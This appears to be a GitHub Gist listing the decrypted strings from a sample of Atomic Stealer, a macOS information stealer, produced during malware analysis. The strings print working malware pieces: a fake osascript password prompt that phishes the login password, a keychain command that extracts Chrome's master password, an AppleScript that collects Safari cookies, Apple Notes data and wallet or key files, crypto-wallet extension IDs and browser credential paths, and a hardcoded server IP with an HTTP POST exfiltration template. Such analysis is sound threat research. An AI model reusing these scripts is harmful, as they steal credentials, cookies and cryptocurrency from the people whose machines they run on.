Last active
March 7, 2024 12:49
-
-
Save Syrion89/0253f808004bac873cad315ce6082f95 to your computer and use it in GitHub Desktop.
atomic_stealer_decrypted_strings_4ac7d15c8a397cd68ba9e7166b2e356175761bf4580d0e03e3db994c3ceda3fa.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[*] Decrypted String at 0x10003DFCA with key 0x77: 5.42.65.114 | |
[*] Decrypted String at 0x10003EBA2 with key 0x84: Binance/app-sto | |
[*] Decrypted String at 0x10003D02A with key 0x11: .DS_Store | |
[*] Decrypted String at 0x10003D042 with key 0x11: Partitions | |
[*] Decrypted String at 0x10003D05A with key 0x38: Code Cache | |
[*] Decrypted String at 0x10003D072 with key 0xc5: dscl . authonly " | |
[*] Decrypted String at 0x10003D092 with key 0xc5: osascript -e 'display dialog "Required Application Helper. Please enter passphrase for | |
[*] Decrypted String at 0x10003D0FA with key 0xea: ." default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "Application wants to install helper" with hidden answer' | |
[*] Decrypted String at 0x10003D1BA with key 0x7e: /Cookies | |
[*] Decrypted String at 0x10003D1D2 with key 0x7e: /Network/Cookies | |
[*] Decrypted String at 0x10003D1F2 with key 0xa1: /Login Data | |
[*] Decrypted String at 0x10003D20A with key 0xa1: /Web Data | |
[*] Decrypted String at 0x10003D222 with key 0x3b: ibnejdfjmmkpcnlpebklmnkoeoihofec | |
[*] Decrypted String at 0x10003D252 with key 0x3b: nkbihfbeogaeaoehlefnkodbefgpgknn | |
[*] Decrypted String at 0x10003D282 with key 0x5c: bocpokimicclpaiekenaeelehdjllofo | |
[*] Decrypted String at 0x10003D2B2 with key 0x5c: nphplpgoakhhjchkkhmiggakijnkhfnd | |
[*] Decrypted String at 0x10003D2E2 with key 0x66: pocmplpaccanhmnllbbkpgfliimjljgo | |
[*] Decrypted String at 0x10003D312 with key 0x66: mfhbebgoclkghebffdldpobeajmbecfk | |
[*] Decrypted String at 0x10003D342 with key 0x95: fhilaheimglignddkjgofkcbgekhenbh | |
[*] Decrypted String at 0x10003D372 with key 0x95: hnhobjmcibchnmglfbldbfabcgaknlkj | |
[*] Decrypted String at 0x10003D3A2 with key 0xb: apnehcjmnengpnmccpaibjmhhoadaico | |
[*] Decrypted String at 0x10003D3D2 with key 0xb: cjmkndjhnagcfbpiemnkdpomccnjblmj | |
[*] Decrypted String at 0x10003D402 with key 0x38: cmndjbecilbocjfkibfbifhngkdmjgog | |
[*] Decrypted String at 0x10003D432 with key 0x38: pnndplcbkakcplkjnolgbkdgjikjednm | |
[*] Decrypted String at 0x10003D462 with key 0xb3: dhgnlgphgchebgoemcjekedjjbifijid | |
[*] Decrypted String at 0x10003D492 with key 0xb3: fhbohimaelbohpjbbldcngcnapndodjp | |
[*] Decrypted String at 0x10003D4C2 with key 0xde: ffnbelfdoeiohenkjibnmadjiehjhajb | |
[*] Decrypted String at 0x10003D4F2 with key 0xde: afbcbjpbpfadlkmhmclhkeeodmamcflc | |
[*] Decrypted String at 0x10003D522 with key 0x60: hnfanknocfeofbddgcijnmhnfnkdnaad | |
[*] Decrypted String at 0x10003D552 with key 0x60: hpglfhgfnhbgpjdenjgmdgoeiappafln | |
[*] Decrypted String at 0x10003D5B2 with key 0x89: kncchdigobghenbbaddojjnnaogfppfj | |
[*] Decrypted String at 0x10003D5E2 with key 0xfb: amkmjjmmflddogmhpjloimipbofnfjih | |
[*] Decrypted String at 0x10003D612 with key 0xfb: nlbmnnijcnlegkjjpcfjclmcfggfefdm | |
[*] Decrypted String at 0x10003D642 with key 0x33: ppdadbejkmjnefldpcdjhnkpbjkikoip | |
[*] Decrypted String at 0x10003D672 with key 0x33: fnjhmkhhmkbjkkabndcnnogagogbneec | |
[*] Decrypted String at 0x10003D6A2 with key 0x90: cphhlgmgameodnhkjdmkpanlelnlohao | |
[*] Decrypted String at 0x10003D6D2 with key 0x90: nhnkbkgjikgcigadomkphalanndcapjk | |
[*] Decrypted String at 0x10003D702 with key 0xc5: kpfopkelmapcoipemfendmdcghnegimn | |
[*] Decrypted String at 0x10003D732 with key 0xc5: copjnifcecdedocejpaapepagaodgpbh | |
[*] Decrypted String at 0x10003D762 with key 0x29: aiifbnbfobpmeekipheeijimdpnlpgpp | |
[*] Decrypted String at 0x10003D792 with key 0x29: dmkamcknogkgcdfhhbddcghachkejeap | |
[*] Decrypted String at 0x10003D7C2 with key 0x5c: cnmamaachppnkjgnildpdmkaakejnhae | |
[*] Decrypted String at 0x10003D7F2 with key 0x5c: jojhfeoedkpkglbfimdfabpdfjaoolaf | |
[*] Decrypted String at 0x10003D822 with key 0xc5: flpiciilemghbmfalicajoolhkkenfel | |
[*] Decrypted String at 0x10003D852 with key 0xc5: nknhiehlklippafakaeklbeglecifhad | |
[*] Decrypted String at 0x10003D882 with key 0xf6: hcflpincpppdclinealmandijcmnkbgn | |
[*] Decrypted String at 0x10003D8B2 with key 0xf6: ookjlbkiijinhpmnjffcofjonbfbgaoc | |
[*] Decrypted String at 0x10003D8E2 with key 0xd1: mnfifefkajgofkcjkemidiaecocnkjeh | |
[*] Decrypted String at 0x10003D912 with key 0xd1: hmeobnfnfcmdkdcmlblgagmfpfboieaf | |
[*] Decrypted String at 0x10003D942 with key 0x11: dkdedlpgdmmkkfjabffeganieamfklkm | |
[*] Decrypted String at 0x10003D972 with key 0x11: nlgbhdfgdhgbiamfdfmbikcdghidoadd | |
[*] Decrypted String at 0x10003D9A2 with key 0x56: cihmoadaighcejopammfbmddcmdekcje | |
[*] Decrypted String at 0x10003D9D2 with key 0x56: lodccjjbdhfakaekdiahmedfbieldgik | |
[*] Decrypted String at 0x10003DA32 with key 0x93: klnaejjgbibmhlephnhpmaofohgkpgkd | |
[*] Decrypted String at 0x10003DA62 with key 0xde: aeachknmefphepccionboohckonoeemg | |
[*] Decrypted String at 0x10003DA92 with key 0xde: fnnegphlobjdpkhecapkijjdkgcjhkib | |
[*] Decrypted String at 0x10003DAC2 with key 0x1a: pdadjkfkgcafgbceimcpbkalnfnepbnk | |
[*] Decrypted String at 0x10003DAF2 with key 0x1a: acmacodkjbdgmoleeebolmdjonilkdbch | |
[*] Decrypted String at 0x10003DB22 with key 0x6b: bfnaelmomeimhlpmgjnjophhpkkoljpa | |
[*] Decrypted String at 0x10003DB52 with key 0x6b: cgeeodpfagjceefieflmdfphplkenlfk | |
[*] Decrypted String at 0x10003DB82 with key 0xa4: imloifkgjagghnncjkhggdhalmcnfklk | |
[*] Decrypted String at 0x10003DBB2 with key 0xa4: aholpfdialjgjfhomihkjbmgjidlcdno | |
[*] Decrypted String at 0x10003DBE2 with key 0xe7: egjidjbpglichdcondbcbdnbeeppgdph | |
[*] Decrypted String at 0x10003DC12 with key 0xe7: efbglgofoippbgcjepnhiblaibcnclgk | |
[*] Decrypted String at 0x10003DC42 with key 0x2f: opcgpfmipidbgpenhmajoajpbobppdil | |
[*] Decrypted String at 0x10003DC72 with key 0x2f: hifafgmccdpekplomjjkcfgodnhcellj | |
[*] Decrypted String at 0x10003DCA2 with key 0x5c: ojggmchlghnjlapmfbnjholfjkiidbch | |
[*] Decrypted String at 0x10003DCD2 with key 0x5c: jnlgamecbpmbajjfhmmmlhejkemejdma | |
[*] Decrypted String at 0x10003DD02 with key 0xa1: dlcobpjiigpikoobohmabehhmhfoodbb | |
[*] Decrypted String at 0x10003DD32 with key 0xa1: ebfidpplhabeedpnhjnobghokpiioolj | |
[*] Decrypted String at 0x10003DD62 with key 0xd4: loinekcabhlmhjjbocijdoimmejangoa | |
[*] Decrypted String at 0x10003DD92 with key 0xd4: ejjladinnckdgjemekebdpeokbikhfci | |
[*] Decrypted String at 0x10003DDC2 with key 0x18: phkbamefinggmakgklpkljjmgibohnba | |
[*] Decrypted String at 0x10003DDF2 with key 0x18: ppbibelpcjmhbdihakflkdcoccbgbkpo | |
[*] Decrypted String at 0x10003DE22 with key 0x51: Chromium/ | |
[*] Decrypted String at 0x10003DE3A with key 0x92: Snapshots | |
[*] Decrypted String at 0x10003DE52 with key 0x3e: /Local Extension Settings/ | |
[*] Decrypted String at 0x10003DE7A with key 0x3e: /cookies.sqlite | |
[*] Decrypted String at 0x10003DE9A with key 0x8d: /formhistory.sqlite | |
[*] Decrypted String at 0x10003DEBA with key 0x8d: /key4.db | |
[*] Decrypted String at 0x10003DED2 with key 0xa2: /logins.json | |
[*] Decrypted String at 0x10003DEEA with key 0xef: security 2>&1 > /dev/null find-generic-password -ga 'Chrome' | awk '{print $2}' | |
[*] Decrypted String at 0x10003DF4A with key 0xef: masterpass-chrome | |
[*] Decrypted String at 0x10003DF6A with key 0xb: POST /p2p HTTP/1.1 | |
Host: | |
[*] Decrypted String at 0x10003DF92 with key 0xb: :80 | |
uuid: | |
[*] Decrypted String at 0x10003DFAA with key 0x56: | |
Content-Length: | |
[*] Decrypted String at 0x10003DFE2 with key 0x77: osascript -e 'set destinationFolderPath to (path to home folder as text) & "fg:" | |
set extensionsList to {"txt","png","jpg","jpeg","wallet","keys","key"} | |
set bankSize to 0 | |
tell application "Finder" | |
set username to short user name of (system info) | |
try | |
[*] Decrypted String at 0x10003E0FA with key 0xc0: if not (exists folder destinationFolderPath) then | |
make new folder at (path to home folder) with properties {name:"fg"} | |
end if | |
set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:") | |
try | |
duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing | |
end try | |
set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:" | |
try | |
[*] Decrypted String at 0x10003E33A with key 0xc0: set notesFolder to folder notesFolderPath | |
set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder | |
repeat with aFile in notesFiles | |
set fileSize to size of aFile | |
if (bankSize + fileSize) 10 * 1024 * 1024 then | |
try | |
duplicate aFile to folder destinationFolderPath with replacing | |
set bankSize to bankSize + fileSize | |
end try | |
else | |
exit repeat | |
end if | |
end repeat | |
[*] Decrypted String at 0x10003E5CA with key 0xd4: end try | |
set desktopFiles to every file of desktop | |
set documentsFiles to every file of folder "Documents" of (path to home folder) | |
repeat with aFile in (desktopFiles & documentsFiles) | |
set fileExtension to name extension of aFile | |
if fileExtension is in extensionsList then | |
set fileSize to size of aFile | |
if (bankSize + fileSize) 10 * 1024 * 1024 then | |
try | |
duplicate aFile to folder destinationFolderPath with replacing | |
set bankSize to bankSize + fileSize | |
end try | |
else | |
exit repeat | |
end if | |
end if | |
end repeat | |
end try | |
end tell' | |
[*] Decrypted String at 0x10003E8EA with key 0x2c: FileGrabber/ | |
[*] Decrypted String at 0x10003E902 with key 0x29: system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType | |
[*] Decrypted String at 0x10003E95A with key 0x7e: /Library/Application Support/ | |
[*] Decrypted String at 0x10003E982 with key 0x7e: /Library/Cookies/Cookies.binarycookies | |
[*] Decrypted String at 0x10003E9BA with key 0x81: safari/saf1 | |
[*] Decrypted String at 0x10003E9D2 with key 0x81: /.config/filezilla/recentservers.xml | |
[*] Decrypted String at 0x10003EA02 with key 0xd4: FileZilla/recentservers.xml | |
[*] Decrypted String at 0x10003EA2A with key 0xd4: Chrome | |
[*] Decrypted String at 0x10003EA42 with key 0xdd: Google/Chrome/ | |
[*] Decrypted String at 0x10003EA62 with key 0x2f: BraveSoftware/Brave-Browser/ | |
[*] Decrypted String at 0x10003EA8A with key 0xab: Microsoft Edge/ | |
[*] Decrypted String at 0x10003EAAA with key 0xb: com.operasoftware.Opera/ | |
[*] Decrypted String at 0x10003EAD2 with key 0xef: com.operasoftware.OperaGX/ | |
[*] Decrypted String at 0x10003EAFA with key 0x4d: Vivaldi/ | |
[*] Decrypted String at 0x10003EB12 with key 0x38: /Library/Application Support/ | |
[*] Decrypted String at 0x10003EB3A with key 0x38: Firefox/Profiles/ | |
[*] Decrypted String at 0x10003EB5A with key 0x93: /Library/Keychains/login.keychain-db | |
[*] Decrypted String at 0x10003EB8A with key 0x93: keychain | |
[*] Decrypted String at 0x10003EBA2 with key 0x84: Binance/app-store.json | |
[*] Decrypted String at 0x10003EBCA with key 0x84: deskwallets/Binance/app-store.json | |
[*] Decrypted String at 0x10003EBFA with key 0xdd: deskwallets/Electrum/ | |
[*] Decrypted String at 0x10003EC1A with key 0xdd: /.electrum/wallets/ | |
[*] Decrypted String at 0x10003EC3A with key 0xc2: deskwallets/Coinomi/ | |
[*] Decrypted String at 0x10003EC5A with key 0xc2: Coinomi/wallets/ | |
[*] Decrypted String at 0x10003EC7A with key 0x2a: deskwallets/Exodus/ | |
[*] Decrypted String at 0x10003EC9A with key 0xf6: deskwallets/Atomic/ | |
[*] Decrypted String at 0x10003ECBA with key 0xf6: atomic/Local Storage/leveldb/ | |
[*] Decrypted String at 0x10003ECE2 with key 0x5c: tell application | |
[*] Decrypted String at 0x10003ED02 with key 0x5c: "Terminal" to close first |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment